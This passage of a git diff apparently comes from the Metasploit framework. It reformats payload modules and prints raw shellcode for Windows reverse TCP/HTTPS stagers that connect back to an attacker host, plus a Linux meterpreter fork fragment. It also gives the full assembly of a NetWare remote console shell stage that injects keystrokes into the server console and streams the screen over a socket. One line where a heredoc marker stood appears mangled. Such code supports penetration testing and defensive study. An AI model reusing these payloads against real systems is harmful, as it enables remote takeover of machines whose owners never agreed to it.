// LIBC.NLM|bsd_socket_mp + dd 0x6877687c // AFPTCP.NLM|LB_malloc + dd 0x8967f0ce // NSS.NLM|NSSMPK_UnlockNss end_reverse: - nop + nop EOS } )) diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 65f85f3125..8fe7ec8b3b 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -34,8 +34,8 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 290, 'V' ], - 'LPORT' => [ 190, 'v' ], # Not a typo, really little endian + 'EXITFUNC' => [ 290, 'V' ], + 'LPORT' => [ 190, 'v' ], # Not a typo, really little endian }, 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index e0afce2c2d..d45e7f9e7f 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] }, - 'Payload' => + 'Payload' => # Length: 290 bytes "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 741ed8b5f9..e42982fa8d 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, - 'Payload' => + 'Payload' => # Length: 294 bytes # Port Offset: 202 # Host Offset: 195 
diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 98f178cab0..b97425173e 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -38,7 +38,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LPORT' => [ 212, 'n' ], 'ReverseConnectRetries' => [ 207, 'C'] }, - 'Payload' => + 'Payload' => # Name: stager_reverse_tcp_dns # Length: 367 bytes # Port Offset: 212 diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index fddfba0a2a..386029cd45 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -77,7 +77,7 @@ module Metasploit3 if(datastore['PrependFork']) # fork() / parent does exit_group() (for threads) - midstager << + midstager << "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\xfc\xcd\x80" end diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index 2079d18db9..370898849c 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb 
@@ -38,7 +38,7 @@ module Metasploit3 { #'EXITFUNC' => [ 443, 'V' ] }, - 'Assembly' => < < points inside SERVER.NLM - cli - sub esp, 8 - mov ecx, esp - sgdt [ecx] + ; search DebuggerSymbolHashTable pointer using GDT system call gate + ; -> points inside SERVER.NLM + cli + sub esp, 8 + mov ecx, esp + sgdt [ecx] - cli - mov ebx, [ecx+2] - mov bp, word ptr [ebx+0x4E] - shl ebp, 16 - mov bp, word ptr [ebx+0x48] + cli + mov ebx, [ecx+2] + mov bp, word ptr [ebx+0x4E] + shl ebp, 16 + mov bp, word ptr [ebx+0x48] f_finddebugger: - cmp dword ptr[ebp], 0 - jnz f_next - cmp dword ptr[ebp+4], 0x808bc201 - jz f_end + cmp dword ptr[ebp], 0 + jnz f_next + cmp dword ptr[ebp+4], 0x808bc201 + jz f_end f_next: - dec ebp - jmp f_finddebugger + dec ebp + jmp f_finddebugger f_end: - mov ebp, [ebp-7] + mov ebp, [ebp-7] - ; resolve function pointers - mov cl, 15 + ; resolve function pointers + mov cl, 15 resolv_ptrs: - push [edi] - call resolv_addr - stosd - dec cl - test cl, cl - jnz resolv_ptrs + push [edi] + call resolv_addr + stosd + dec cl + test cl, cl + jnz resolv_ptrs - sti + sti - ; all screens have the same size - push edi - lea esi, [edi+4] - push esi - call [edi-0x18] ; SERVER.NLM|GetScreenSize + ; all screens have the same size + push edi + lea esi, [edi+4] + push esi + call [edi-0x18] ; SERVER.NLM|GetScreenSize - ; allocate 2 buffer for the main screen and the backup - xor eax, eax - xor ebx, ebx - mov ax, word ptr[edi] - mov bx, word ptr[esi] - imul eax, ebx - mov [edi+8], eax + ; allocate 2 buffer for the main screen and the backup + xor eax, eax + xor ebx, ebx + mov ax, word ptr[edi] + mov bx, word ptr[esi] + imul eax, ebx + mov [edi+8], eax - push eax - call [edi-8] ; AFPTCP.NLM|LB_malloc - mov [edi+0xc], eax + push eax + call [edi-8] ; AFPTCP.NLM|LB_malloc + mov [edi+0xc], eax - call [edi-0x14] ; SERVER.NLM|GetSystemConsoleScreen - mov [edi+0x10], eax + call [edi-0x14] ; SERVER.NLM|GetSystemConsoleScreen + mov [edi+0x10], eax - sub esp, 4 - mov ebp, esp ; n + sub esp, 4 + 
mov ebp, esp ; n recv_loop: - xor ebx, ebx - inc ebx + xor ebx, ebx + inc ebx - push 200000 ; tv_usec - push 0 ; tv_sec (0) - mov edx, esp ; timeout + push 200000 ; tv_usec + push 0 ; tv_sec (0) + mov edx, esp ; timeout - sub esp, 4 - mov ecx, esp ; rescode + sub esp, 4 + mov ecx, esp ; rescode - push 1 ; num socket (1) - push ecx ; &rescode - push edx ; &timeout - push 0 ; NULL - push 0 ; NULL - push 0 ; NULL - push [edi-0x40] ; socket - call [edi-0x2C] ; LIBC.NLM|bsd_select_mp - add esp, 0x28 - test eax, eax - jnz end + push 1 ; num socket (1) + push ecx ; &rescode + push edx ; &timeout + push 0 ; NULL + push 0 ; NULL + push 0 ; NULL + push [edi-0x40] ; socket + call [edi-0x2C] ; LIBC.NLM|bsd_select_mp + add esp, 0x28 + test eax, eax + jnz end - call update_screen + call update_screen - sub esp, 4 - mov edx, esp - push edx ; &rescode - push ebp ; &n - push ebx ; FIONREAD - push [edi-0x40] ; socket - call [edi-0x38] ; LIBC.NLM|_ioctlsocket - add esp, 0x14 - test eax, eax - jnz end - cmp [ebp], 0 - jz recv_loop - ; check we are not longer than the key buffer size - cmp [ebp], 32 - jbe recvd - mov [ebp], 32 + sub esp, 4 + mov edx, esp + push edx ; &rescode + push ebp ; &n + push ebx ; FIONREAD + push [edi-0x40] ; socket + call [edi-0x38] ; LIBC.NLM|_ioctlsocket + add esp, 0x14 + test eax, eax + jnz end + cmp [ebp], 0 + jz recv_loop + ; check we are not longer than the key buffer size + cmp [ebp], 32 + jbe recvd + mov [ebp], 32 recvd: - lea eax, [edi+0x20] - push [ebp] - push eax - call recv_data - add esp, 8 + lea eax, [edi+0x20] + push [ebp] + push eax + call recv_data + add esp, 8 - mov ebx, [ebp] - lea esi, [edi+0x20] - mov byte ptr[esi+ebx], 0 + mov ebx, [ebp] + lea esi, [edi+0x20] + mov byte ptr[esi+ebx], 0 -; push 0x00FFFEFF -; mov eax, esp -; push eax -; push [edi+0x10] ; screen -; call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen -; add esp, 0x0c + ;push 0x00FFFEFF + ;mov eax, esp + ;push eax + ;push [edi+0x10] ; screen + ;call [edi-0x3C] ; 
SERVER.NLM|DirectOutputToScreen + ;add esp, 0x0c send_input: - movzx eax, byte ptr[esi] - test eax, eax - jz send_end + movzx eax, byte ptr[esi] + test eax, eax + jz send_end - cmp al, 0x0a - jz send_enter + cmp al, 0x0a + jz send_enter - ; we need to inject the command in the console input - push 0x00 - push 0x00 ; should be the keycode in fact - push eax ; key value - push 0x0 - push [edi+0x10] ; screen - call [edi-0x20] ; SERVER.NLM|AddKey - jmp send_next + ; we need to inject the command in the console input + push 0x00 + push 0x00 ; should be the keycode in fact + push eax ; key value + push 0x0 + push [edi+0x10] ; screen + call [edi-0x20] ; SERVER.NLM|AddKey + jmp send_next send_enter: - ; send special code for enter - push 0x1c - push 0x00 - push 0x00 - push 0x02 - push [edi+0x10] ; screen - call [edi-0x20] ; SERVER.NLM|AddKey + ; send special code for enter + push 0x1c + push 0x00 + push 0x00 + push 0x02 + push [edi+0x10] ; screen + call [edi-0x20] ; SERVER.NLM|AddKey - push 0x00FFFEFF - mov eax, esp - push eax - push [edi+0x10] ; screen - call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen - add esp, 0x0c + push 0x00FFFEFF + mov eax, esp + push eax + push [edi+0x10] ; screen + call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen + add esp, 0x0c send_next: - add esp, 0x14 - inc esi - jmp send_input + add esp, 0x14 + inc esi + jmp send_input send_end: - jmp recv_loop + jmp recv_loop end: - sub esp, 4 - mov ebp, esp ; rescode + sub esp, 4 + mov ebp, esp ; rescode - push ebp ; rescode - push 2 ; SHUT_RDWR - push [edi-0x40] ; socket - call [edi-0x30] ; LIBC.NLM|bsd_shutdown_mp + push ebp ; rescode + push 2 ; SHUT_RDWR + push [edi-0x40] ; socket + call [edi-0x30] ; LIBC.NLM|bsd_shutdown_mp - push ebp ; rescode - push [edi-0x40] ; socket - call [edi-0x34] ; LIBC.NLM|bsd_close_mp - - ; go back to the main kernel loop - call [edi-0x0C] ; SERVER.NLM|kWorkerThread + push ebp ; rescode + push [edi-0x40] ; socket + call [edi-0x34] ; LIBC.NLM|bsd_close_mp + + ; go back to 
the main kernel loop + call [edi-0x0C] ; SERVER.NLM|kWorkerThread update_screen: - pushad + pushad - push [edi+0x0c] - push 0 - push [edi+0x08] - push 0 - push [edi+0x10] - call [edi-0x1C] ; SERVER.NLM|ReadScreenIntoBuffer - add esp, 0x14 + push [edi+0x0c] + push 0 + push [edi+0x08] + push 0 + push [edi+0x10] + call [edi-0x1C] ; SERVER.NLM|ReadScreenIntoBuffer + add esp, 0x14 - mov edx, [edi+0x0c] - xor ebx, ebx - xor esi, esi - xor ebp, ebp + mov edx, [edi+0x0c] + xor ebx, ebx + xor esi, esi + xor ebp, ebp checksum: - cmp ebx, [edi+4] - jz end_checksum - xor ecx, ecx + cmp ebx, [edi+4] + jz end_checksum + xor ecx, ecx check_line: - cmp ecx, [edi] - jz next_line - mov al, byte ptr[edx] - ror esi, 0x0d - add esi, eax - cmp [edx], 0x20FFFEFF - jnz check_line2 - mov ebp, ebx - inc ebp + cmp ecx, [edi] + jz next_line + mov al, byte ptr[edx] + ror esi, 0x0d + add esi, eax + cmp [edx], 0x20FFFEFF + jnz check_line2 + mov ebp, ebx + inc ebp check_line2: - inc edx - inc ecx - jmp check_line + inc edx + inc ecx + jmp check_line next_line: - inc ebx - jmp checksum + inc ebx + jmp checksum end_checksum: - cmp esi, [edi+0x14] - jnz new_checksum - cmp [edi+0x18], 1 - jz end_update - mov [edi+0x18], 1 - push ebp - call send_screen - add esp, 4 - jmp end_update + cmp esi, [edi+0x14] + jnz new_checksum + cmp [edi+0x18], 1 + jz end_update + mov [edi+0x18], 1 + push ebp + call send_screen + add esp, 4 + jmp end_update new_checksum: - mov [edi+0x14], esi - mov [edi+0x18], 0 + mov [edi+0x14], esi + mov [edi+0x18], 0 end_update: - popad - ret + popad + ret send_screen: - push ebx + push ebx - sub esp, 4 - mov esi, esp + sub esp, 4 + mov esi, esp - push esi - lea eax, [esi+2] - push eax - push [edi+0x10] - call [edi-0x10] ; SERVER.NLM|GetInputCursorPosition - add esp, 0x0c - - mov ebx, [esp+0x0c] - xor edx, edx - mov ecx, [edi+0x0c] - mov eax, dword ptr[edi] - imul eax, ebx - add ecx, eax + push esi + lea eax, [esi+2] + push eax + push [edi+0x10] + call [edi-0x10] ; 
SERVER.NLM|GetInputCursorPosition + add esp, 0x0c + + mov ebx, [esp+0x0c] + xor edx, edx + mov ecx, [edi+0x0c] + mov eax, dword ptr[edi] + imul eax, ebx + add ecx, eax send_loop: - cmp bx, word ptr[esi+2] - jae last_line - mov dx, word ptr[edi] - jmp next_send + cmp bx, word ptr[esi+2] + jae last_line + mov dx, word ptr[edi] + jmp next_send last_line: - mov dx, word ptr[esi] + mov dx, word ptr[esi] next_send: - push edx - push ecx - call send_data - add esp, 0x08 - - cmp bx, word ptr[esi+2] - jae end_sl - - push 0x0000000a - mov eax, esp - push 1 - push eax - call send_data - add esp, 0x0C - - inc ebx - add ecx, edx - cmp bx, word ptr[esi+2] - jbe send_loop + push edx + push ecx + call send_data + add esp, 0x08 + + cmp bx, word ptr[esi+2] + jae end_sl + + push 0x0000000a + mov eax, esp + push 1 + push eax + call send_data + add esp, 0x0C + + inc ebx + add ecx, edx + cmp bx, word ptr[esi+2] + jbe send_loop end_sl: - pop ebx - pop ebx - ret + pop ebx + pop ebx + ret send_data: - push [esp+8] - push [esp+8] - push [edi-0x40] - push [edi-0x24] - call sendrecv_data - add esp, 0x10 - ret + push [esp+8] + push [esp+8] + push [edi-0x40] + push [edi-0x24] + call sendrecv_data + add esp, 0x10 + ret recv_data: - push [esp+8] - push [esp+8] - push [edi-0x40] - push [edi-0x28] - call sendrecv_data - add esp, 0x10 - ret + push [esp+8] + push [esp+8] + push [edi-0x40] + push [edi-0x28] + call sendrecv_data + add esp, 0x10 + ret sendrecv_data: - push ebp - push ecx - push ebx - push edx - mov ebp, esp - - push [ebp+0x20] ; iov_len - push [ebp+0x1C] ; iov_base - mov ecx, esp ; msg_iov - - xor ebx, ebx ; struct msghdr - push ebx ; msg_flags - push ebx ; msg_controllen - push ebx ; msg_control - inc ebx - push ebx ; msg_iovlen (1 array) - dec ebx - push ecx ; msg_iov - push ebx ; msg_namelen - push ebx ; msg_name - - mov ecx, esp ; message - - sub esp, 4 - mov edx, esp ; rescode - - push edx ; rescode - push 0 ; flags - push ecx ; message - push [ebp+0x18] ; socket - call [ebp+0x14] 
; SERVER.NLM|bsd_recvmsg_mp - - mov esp, ebp - pop edx - pop ebx - pop ecx - pop ebp - ret + push ebp + push ecx + push ebx + push edx + mov ebp, esp + push [ebp+0x20] ; iov_len + push [ebp+0x1C] ; iov_base + mov ecx, esp ; msg_iov + + xor ebx, ebx ; struct msghdr + push ebx ; msg_flags + push ebx ; msg_controllen + push ebx ; msg_control + inc ebx + push ebx ; msg_iovlen (1 array) + dec ebx + push ecx ; msg_iov + push ebx ; msg_namelen + push ebx ; msg_name + + mov ecx, esp ; message + + sub esp, 4 + mov edx, esp ; rescode + + push edx ; rescode + push 0 ; flags + push ecx ; message + push [ebp+0x18] ; socket + call [ebp+0x14] ; SERVER.NLM|bsd_recvmsg_mp + + mov esp, ebp + pop edx + pop ebx + pop ecx + pop ebp + ret + socket_ptr: - dd 0 + dd 0 fct_ptrs: - dd 0xadc21dfc ; SERVER.NLM|DirectUnformattedOutputToScreen - dd 0xb08c8051 ; LIBC.NLM|_ioctlsocket - dd 0x4907702d ; LIBC.NLM|bsd_close_mp - dd 0x312cc527 ; LIBC.NLM|bsd_shutdown_mp - dd 0x46c65ccd ; LIBC.NLM|bsd_select_mp - dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp - dd 0x35bdd27c ; LIBC.NLM|bsd_sendmsg_mp - dd 0xe98bfec3 ; SERVER.NLM|AddKey - dd 0x6ea378a4 ; SERVER.NLM|ReadScreenIntoBuffer - dd 0x898d560c ; SERVER.NLM|GetScreenSize - dd 0x03cfcbe3 ; SERVER.NLM|GetSystemConsoleScreen - dd 0xfe52051f ; SERVER.NLM|GetInputCursorPosition - dd 0x9294bdcb ; SERVER.NLM|kWorkerThread - dd 0x6877687c ; AFPTCP.NLM|LB_malloc - dd 0xaf50f9e7 ; AFPTCP.NLM|LB_free + dd 0xadc21dfc ; SERVER.NLM|DirectUnformattedOutputToScreen + dd 0xb08c8051 ; LIBC.NLM|_ioctlsocket + dd 0x4907702d ; LIBC.NLM|bsd_close_mp + dd 0x312cc527 ; LIBC.NLM|bsd_shutdown_mp + dd 0x46c65ccd ; LIBC.NLM|bsd_select_mp + dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp + dd 0x35bdd27c ; LIBC.NLM|bsd_sendmsg_mp + dd 0xe98bfec3 ; SERVER.NLM|AddKey + dd 0x6ea378a4 ; SERVER.NLM|ReadScreenIntoBuffer + dd 0x898d560c ; SERVER.NLM|GetScreenSize + dd 0x03cfcbe3 ; SERVER.NLM|GetSystemConsoleScreen + dd 0xfe52051f ; SERVER.NLM|GetInputCursorPosition + dd 0x9294bdcb ; 
SERVER.NLM|kWorkerThread + dd 0x6877687c ; AFPTCP.NLM|LB_malloc + dd 0xaf50f9e7 ; AFPTCP.NLM|LB_free screen_info: - dd 0 - dd 0 - dd 0 - dd 0 - dd 0 - dd 0 ; screen checksum - dd 0 ; screen state + dd 0 + dd 0 + dd 0 + dd 0 + dd 0 + dd 0 ; screen checksum + dd 0 ; screen state end_reverse: - nop + nop EOS } ))